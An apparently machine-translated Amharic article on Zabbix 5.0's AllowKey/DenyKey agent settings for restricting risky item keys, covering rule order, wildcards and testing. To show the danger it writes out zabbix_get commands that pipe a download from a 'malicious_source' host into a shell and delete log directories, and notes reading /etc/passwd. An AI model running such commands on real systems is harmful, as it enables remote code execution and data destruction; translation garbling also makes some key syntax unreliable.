የተከለከሉ መዝገብ እና የተፈቀደላቸው ለተወካይ-ጎን መለኪያዎች ድጋፍ
ቲኮን ኡስኮቭ, ውህደት መሐንዲስ, Zabbix
የውሂብ ደህንነት ጉዳዮች
Zabbix 5.0 የዛቢክስ ወኪልን በመጠቀም በሲስተሞች ውስጥ ደህንነትን እንዲያሻሽሉ እና የድሮውን ግቤት የሚተካ አዲስ ባህሪ አለው። የርቀት ትዕዛዞችን አንቃ.
በወኪል ላይ የተመሰረቱ ስርዓቶች ደህንነት ላይ የተደረጉ ማሻሻያዎች አንድ ወኪል ብዙ ቁጥር ያላቸውን አደገኛ ሊሆኑ የሚችሉ ድርጊቶችን ማከናወን ስለሚችል ነው።
- ተወካዩ ሚስጥራዊ ወይም አደገኛ ሊሆን የሚችል መረጃን ጨምሮ ማንኛውንም መረጃ ከውቅረት ፋይሎች፣ ሎግ ፋይሎች፣ የይለፍ ቃል ፋይሎች ወይም ሌሎች ፋይሎች መሰብሰብ ይችላል።
ለምሳሌ፣ zabbix_get utilityን በመጠቀም የተጠቃሚዎችን ዝርዝር፣የቤታቸውን ማውጫዎች፣የይለፍ ቃል ፋይሎችን ወዘተ ማግኘት ይችላሉ።
zabbix_get utilityን በመጠቀም ውሂብን መድረስ
ማስታወሻ. ውሂብን ማውጣት የሚቻለው ወኪሉ በተዛማጅ ፋይል ላይ የንባብ ፍቃዶችን ካገኘ ብቻ ነው።. ግን, ለምሳሌ, ፋይሉ /ወዘተ/passwd/ በሁሉም ተጠቃሚዎች ሊነበብ የሚችል.
- ተወካዩ አደገኛ ሊሆኑ የሚችሉ ትዕዛዞችንም ሊፈጽም ይችላል። ለምሳሌ ቁልፍ *ስርዓት.አሂድ[]** ማንኛውንም የርቀት ትእዛዞችን በኔትወርክ ኖዶች ላይ እንዲፈጽሙ ይፈቅድልዎታል፣ ከ Zabbix የድር በይነገጽ የሩጫ ስክሪፕቶችን ጨምሮ እንዲሁም በተወካይ በኩል ትዕዛዞችን ያስፈጽማሉ።
# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]
# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]- በሊኑክስ ላይ ተወካዩ ያለ root privileges በነባሪ ይሰራል፣ በዊንዶውስ ላይ ደግሞ እንደ ሲስተም ሆኖ አገልግሎት ይሰራል እና የፋይል ስርዓቱን ያልተገደበ መዳረሻ አለው። በዚህ መሠረት, ከተጫነ በኋላ በ Zabbix Agent መለኪያዎች ላይ ምንም ለውጦች ካልተደረጉ, ወኪሉ ወደ መዝገብ ቤት, የፋይል ስርዓት እና የ WMI ጥያቄዎችን ማከናወን ይችላል.
በቀደሙት ስሪቶች መለኪያው አንቃ RemoteCommands=0 መለኪያዎችን በቁልፍ ብቻ ለማሰናከል ተፈቅዶለታል *ስርዓት.አሂድ[]** እና ስክሪፕቶችን ከድር በይነገጽ ማስኬድ፣ ነገር ግን የነጠላ ፋይሎችን መዳረሻ የሚገድብበት፣ ከወኪሉ ጋር የተጫኑ ነጠላ ቁልፎችን ለመፍቀድ ወይም ለማሰናከል፣ ወይም የግለሰብ መለኪያዎች አጠቃቀምን የሚገድብበት ምንም መንገድ አልነበረም።
የEnableRemoteCommand መለኪያን በቀድሞዎቹ የዛቢቢክስ ስሪቶች መጠቀም
AllowKey/DenyKey
Zabbix 5.0 በወኪሉ በኩል መለኪያዎችን ለመፍቀድ እና ለመከልከል የተፈቀደላቸው ዝርዝሮችን እና የተከለከሉ ዝርዝሮችን በማቅረብ ከእንደዚህ አይነት ያልተፈቀደ መዳረሻ ለመጠበቅ ይረዳል።
በ Zabbix 5.0 ውስጥ * ጨምሮ ሁሉም ቁልፎችስርዓት.አሂድ[]** ነቅተዋል፣ እና ሁለት አዲስ የወኪል ውቅር አማራጮች ታክለዋል፡
AllowKey= - የተፈቀዱ ቼኮች;
ዴኒኪ= - የተከለከሉ ቼኮች;
ሜታ ቁምፊዎችን (*).የሚጠቀሙ መለኪያዎች ያሉት የቁልፍ ስም ጥለት የት አለ
የAllowKey እና DenyKey ቁልፎች በአንድ የተወሰነ ስርዓተ-ጥለት ላይ ተመስርተው ነጠላ መለኪያዎችን እንድትፈቅዱ ወይም እንድትክዱ ያስችሉሃል። እንደሌሎች የውቅረት መመዘኛዎች የAllowKey/DenyKey መለኪያዎች ብዛት የተገደበ አይደለም። ይህ የቼክ ዛፍን - የሚተገበሩ ቁልፎችን በመፍጠር ተወካዩ በትክክል በስርዓቱ ውስጥ ምን ማድረግ እንደሚችል በግልፅ እንዲገልጹ ያስችልዎታል ፣ የተፃፉበት ቅደም ተከተል በጣም አስፈላጊ ሚና የሚጫወትበት።
የደንቦች ቅደም ተከተል
ደንቦቹ በማዋቀሪያው ፋይል ውስጥ በገቡበት ቅደም ተከተል ላይ ምልክት ይደረግባቸዋል. ቁልፉ ከመጀመሪያው ግጥሚያ በፊት በህጉ መሰረት ነው የሚመረመረው እና የመረጃው አካል ቁልፍ ከስርዓተ-ጥለት ጋር ሲመሳሰል ወዲያውኑ ይፈቀዳል ወይም ይከለክላል። ከዚህ በኋላ የደንብ ማጣራት ይቆማል እና የተቀሩት ቁልፎች ችላ ይባላሉ.
ስለዚህ፣ አንድ ኤለመንቱ ከተፈቀደ እና ውድቅ ህግ ጋር የሚዛመድ ከሆነ፣ ውጤቱ የሚወሰነው በማዋቀሪያው ፋይል ውስጥ በመጀመሪያ የትኛው ህግ እንደሆነ ነው።
2 የተለያዩ ደንቦች ከተመሳሳይ ንድፍ እና ቁልፍ ጋር vfs.file.size[/tmp/file]
የAllowKey/DenyKey ቁልፎችን የመጠቀም ቅደም ተከተል፡-
- ትክክለኛ ህጎች ፣
- አጠቃላይ ህጎች ፣
- የተከለከለ ህግ.
ለምሳሌ ፣ በአንድ የተወሰነ አቃፊ ውስጥ ያሉ ፋይሎችን መድረስ ከፈለጉ በመጀመሪያ እነሱን እንዲደርሱባቸው መፍቀድ እና ከዚያ በተቀመጡት ፈቃዶች ውስጥ የማይገቡትን ሁሉንም ነገሮች መከልከል አለብዎት። ውድቅ ደንቡ መጀመሪያ ጥቅም ላይ ከዋለ ወደ አቃፊው መድረስ ይከለክላል።
ትክክለኛ ቅደም ተከተል
2 መገልገያዎች በ* በኩል እንዲሄዱ መፍቀድ ከፈለጉስርዓት.አሂድ[]**, እና ውድቅ ደንቡ በመጀመሪያ ይገለጻል, መገልገያዎቹ አይጀመሩም, ምክንያቱም የመጀመሪያው ስርዓተ-ጥለት ሁልጊዜ ከማንኛውም ቁልፍ ጋር ይጣጣማል, እና ተከታይ ደንቦች ችላ ይባላሉ.
የተሳሳተ ቅደም ተከተል
ቅጦች
መሰረታዊ ደንቦች
ስርዓተ-ጥለት ከዱር ምልክቶች ጋር መግለጫ ነው። ሜታ ቁምፊ (*) በተወሰነ ቦታ ላይ ካሉት የቁምፊዎች ቁጥር ጋር ይዛመዳል። Metacharacter ሁለቱንም በቁልፍ ስም እና በመለኪያዎች ውስጥ መጠቀም ይቻላል. ለምሳሌ ፣ የመጀመሪያውን ግቤት ከጽሑፍ ጋር በጥብቅ መግለፅ ይችላሉ ፣ እና ተከታዩን እንደ ዱር ካርድ ይግለጹ.
መለኪያዎች በካሬ ቅንፎች [] ውስጥ መያያዝ አለባቸው።
system.run[*- ስህተትvfs.file*.txt]- ስህተትvfs.file.*[*]- ቀኝ
የዱር ምልክት አጠቃቀም ምሳሌዎች።
- በቁልፍ ስም እና በመለኪያው ውስጥ. በዚህ ሁኔታ ቁልፉ መለኪያ ከሌለው ተመሳሳይ ቁልፍ ጋር አይዛመድም ምክንያቱም በስርዓተ-ጥለት ውስጥ የተወሰነ የቁልፍ ስም መጨረሻ እና የተወሰኑ መለኪያዎች መቀበል እንደምንፈልግ አመልክተናል።
- ንድፉ የካሬ ቅንፎችን የማይጠቀም ከሆነ ንድፉ ግቤቶችን ያልያዙትን ሁሉንም ቁልፎች ይፈቅዳል እና የተጠቀሰውን ግቤት የያዙ ሁሉንም ቁልፎች ይክዳል።
- ቁልፉ ሙሉ በሙሉ ከተፃፈ እና መለኪያዎቹ እንደ ዱር ካርድ ከተገለጹ, ከማንኛውም ተመሳሳይ ቁልፍ ከማንኛውም መመዘኛዎች ጋር ይዛመዳል እና ከቁልፉ ያለ ካሬ ቅንፎች ጋር አይዛመድም, ማለትም ይፈቀዳል ወይም ይከለክላል.
መለኪያዎችን ለመሙላት ደንቦች.
- ግቤቶች ያለው ቁልፍ ጥቅም ላይ እንዲውል የታቀደ ከሆነ, መለኪያዎቹ በማዋቀሪያው ፋይል ውስጥ መገለጽ አለባቸው. መለኪያዎች እንደ ሜታ ቁምፊ መገለጽ አለባቸው። የማንኛውም ፋይል መዳረሻ በጥንቃቄ መከልከል እና መለኪያው በተለያዩ የፊደል አጻጻፍ ስር ሊሰጥ የሚችለውን መረጃ ግምት ውስጥ ማስገባት ያስፈልጋል - ያለ እና ያለ መመዘኛዎች።
ከግቤቶች ጋር የመጻፍ ቁልፎች ባህሪያት
- ቁልፉ ከግቤቶች ጋር ከተገለጸ ግን መለኪያዎቹ አማራጭ ከሆኑ እና እንደ ሜታ ካራክተር ከተገለጹ፣ መለኪያ የሌለው ቁልፍ መፍትሄ ያገኛል። ለምሳሌ፣ በሲፒዩ ላይ ስላለው ጭነት መረጃ መቀበልን ማሰናከል እና የ system.cpu.load[*] ቁልፍ መሰናከል እንዳለበት ከገለጹ፣ ያለ መመዘኛዎች ያለው ቁልፍ አማካይ የጭነት ዋጋን እንደሚመልስ አይርሱ።
መለኪያዎችን ለመሙላት ደንቦች
ማስታወሻዎች
በደንብ ማድረግ
- አንዳንድ ደንቦች በተጠቃሚው ሊለወጡ አይችሉም፣ ለምሳሌ፣ የግኝት ደንቦች ወይም የወኪል ራስ-ምዝገባ ደንቦች። የAllowKey/DenyKey ደንቦች በሚከተሉት መለኪያዎች ላይ ተጽዕኖ አይኖራቸውም፡
- የአስተናጋጅ ስም ንጥል
- HostMetadataItem
- HostInterfaceItem
ማስታወሻ. አንድ አስተዳዳሪ ቁልፍን ካሰናከለ፣ ሲጠየቅ፣ Zabbix ሜትሪክ ወይም ቁልፉ ለምን በ' ምድብ ውስጥ እንደወደቀ መረጃ አይሰጥም።አይደገፍም' . የርቀት ትዕዛዞችን ስለመፈጸም የተከለከሉ መረጃዎች እንዲሁ በወኪል መዝገብ መዝገብ ውስጥ አይታዩም። ይህ ለደህንነት ሲባል ነው፣ ነገር ግን መለኪያዎች በሆነ ምክንያት ወደማይደገፍ ምድብ ውስጥ ከገቡ ማረምን ሊያወሳስበው ይችላል።.
- ውጫዊ ውቅር ፋይሎችን ለማገናኘት በማንኛውም የተለየ ትዕዛዝ ላይ መተማመን የለብዎትም (ለምሳሌ በፊደል ቅደም ተከተል)።
የትእዛዝ መስመር መገልገያዎች
ደንቦቹን ካዘጋጁ በኋላ, ሁሉም ነገር በትክክል መዋቀሩን ማረጋገጥ አለብዎት.
ከሶስት አማራጮች ውስጥ አንዱን መጠቀም ይችላሉ-
- ወደ Zabbix መለኪያ ያክሉ።
- ጋር ይሞክሩ zabbix_ወኪል. የ Zabbix ወኪል ከአማራጭ ጋር - ማተም (-p) በቅንጅቱ ካልተፈቀዱ በስተቀር ሁሉንም ቁልፎች ያሳያል (በነባሪነት የተፈቀዱ)። እና ከአማራጭ ጋር ሙከራ (-ቲ) የተከለከለው ቁልፍ ተመልሶ ይመጣልናየማይደገፍ የንጥል ቁልፍ'.
- ጋር ይሞክሩ zabbix_ማግኘት. መገልገያ zabbix_ማግኘት ከአማራጭ ጋር -k ይመለሳል 'ZBX_NOTSUPPORTED፡ ያልታወቀ ልኬት'.
ፍቀድ ወይም እምቢ
የፋይል መዳረሻን መከልከል እና ለምሳሌ መገልገያውን ማረጋገጥ ይችላሉ። zabbix_ማግኘትየፋይሉ መዳረሻ ተከልክሏል.
**
ማስታወሻ. በመለኪያው ውስጥ ያሉ ጥቅሶች ችላ ተብለዋል።.
በዚህ አጋጣሚ, እንደዚህ አይነት ፋይል መዳረሻ በተለየ መንገድ ሊፈቀድ ይችላል. ለምሳሌ፣ ሲምሊንክ ወደ እሱ የሚመራ ከሆነ።
የተገለጹትን ደንቦች ለመተግበር የተለያዩ አማራጮችን ለመፈተሽ ይመከራል, እና እንዲሁም የተከለከሉትን የማቋረጥ እድሎችን ግምት ውስጥ ያስገቡ.
ጥያቄዎች እና መልሶች
ጥያቄ. ሕጎችን፣ ፍቃዶችን እና ክልከላዎችን ለመግለጽ የራሱ ቋንቋ ያለው እንደዚህ ያለ ውስብስብ ንድፍ ለምን ተመረጠ? ለምሳሌ ዛቢክስ የሚጠቀምባቸውን መደበኛ አባባሎች ለምን መጠቀም አልተቻለም?
ምላሽ ይስጡ. ብዙውን ጊዜ አንድ ወኪል ብቻ ስላለ እና እጅግ በጣም ብዙ መለኪያዎችን ስለሚፈትሽ ይህ የሬጌክስ አፈጻጸም ጉዳይ ነው። Regex በጣም ከባድ ስራ ነው እና በሺዎች የሚቆጠሩ መለኪያዎችን በዚህ መንገድ ማረጋገጥ አንችልም። የዱር ካርዶች - ሁለንተናዊ, በስፋት ጥቅም ላይ የዋለ እና ቀላል መፍትሄ.
ጥያቄ. የማካተት ፋይሎች በፊደል ቅደም ተከተል አልተካተቱም?
ምላሽ ይስጡ. እኔ እስከማውቀው ድረስ ህጎቹን በተለያዩ ፋይሎች ላይ ካሰራጩ የትኛዎቹ ደንቦች እንደሚተገበሩ ለመተንበይ ፈጽሞ የማይቻል ነው. ሁሉንም የAllowKey/DenyKey ደንቦችን በአንድ እንዲሰበስቡ እመክራለሁ ፋይልን ያካትቱ፣ ምክንያቱም እርስ በርሳቸው ስለሚገናኙ እና ይህን ፋይል ጨምሮ።.
ጥያቄ. በ Zabbix 5.0 ውስጥ ያለው አማራጭ 'አንቃ RemoteCommands=ከማዋቀሪያው ፋይል ይጎድላል፣ እና AllowKey/DenyKey ብቻ ነው የሚገኙት?
መልስ። አዎ ልክ ነው.
ለሚያደርጉት ጥረት እናመሰግናለን!
ምንጭ: hab.com